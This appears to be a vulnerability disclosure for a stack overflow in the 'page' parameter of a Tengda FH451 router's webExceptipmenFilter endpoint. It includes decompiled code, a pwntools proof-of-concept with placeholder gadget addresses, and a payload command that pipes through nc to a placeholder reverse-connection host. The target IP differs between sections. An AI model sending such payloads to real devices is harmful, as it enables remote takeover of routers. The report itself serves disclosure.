### Key Information Summary #### Vulnerability Overview - **Vulnerability Type**: Remote Code Execution (RCE) - **Affected Device**: Shenzhen Jixiang Tengda Technology Co., Ltd. FH451 Router - **Vulnerable URL**: `http://192.168.100.157:80/goform/webExceptipmenFilter` #### Vulnerability Analysis - **Critical Function**: `webExceptipmenFilter` - **Issue**: No length check is performed on the `page` parameter, leading to a buffer overflow. - **Code Snippet**: ```c v3 = webGetVar(s, "page", &unk_81E0B3); sub_39A4C("filter.webexcept.en", 126); v6 = webGetVar(s, "ipflag", &unk_81E0B3); Setvalue("ipgroup_flag", v6); strcpy(v3, "add"); ``` - **Impact**: When the `page` parameter exceeds a safe length, it causes a stack overflow, potentially leading to application crash or remote code execution. #### Reproduction Steps - **Example Request**: ```python import requests from pwn import * libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") system_offset = libc.symbols["system"] base = 0x60000000 cmd = b"echo REVERSECONNECTIONHERE|nc REVERSECONNECTIONIP REVERSECONNECTIONPORT" move_r0 = base + 0xdeadbeef r_cmd = base + 0xdeadbeef url = "http://192.168.100.156:80/goform/webExceptipmenFilter" payload = {"page": cyclic(1024) + p32(r_cmd) + p32(move_r0) + cmd} res = requests.post(url, data=payload) ``` #### Test Results - **Screenshot Shows**: After sending the crafted malicious request, the target device exhibited connection failure and a core dump (Segmentation Fault), confirming successful exploitation of the vulnerability. #### Conclusion This vulnerability arises from improper handling of the `page` parameter in the `webExceptipmenFilter` function. By crafting a specific request, an attacker can trigger a stack overflow, leading to remote code execution. Attackers can exploit this vulnerability to execute arbitrary commands on the target device.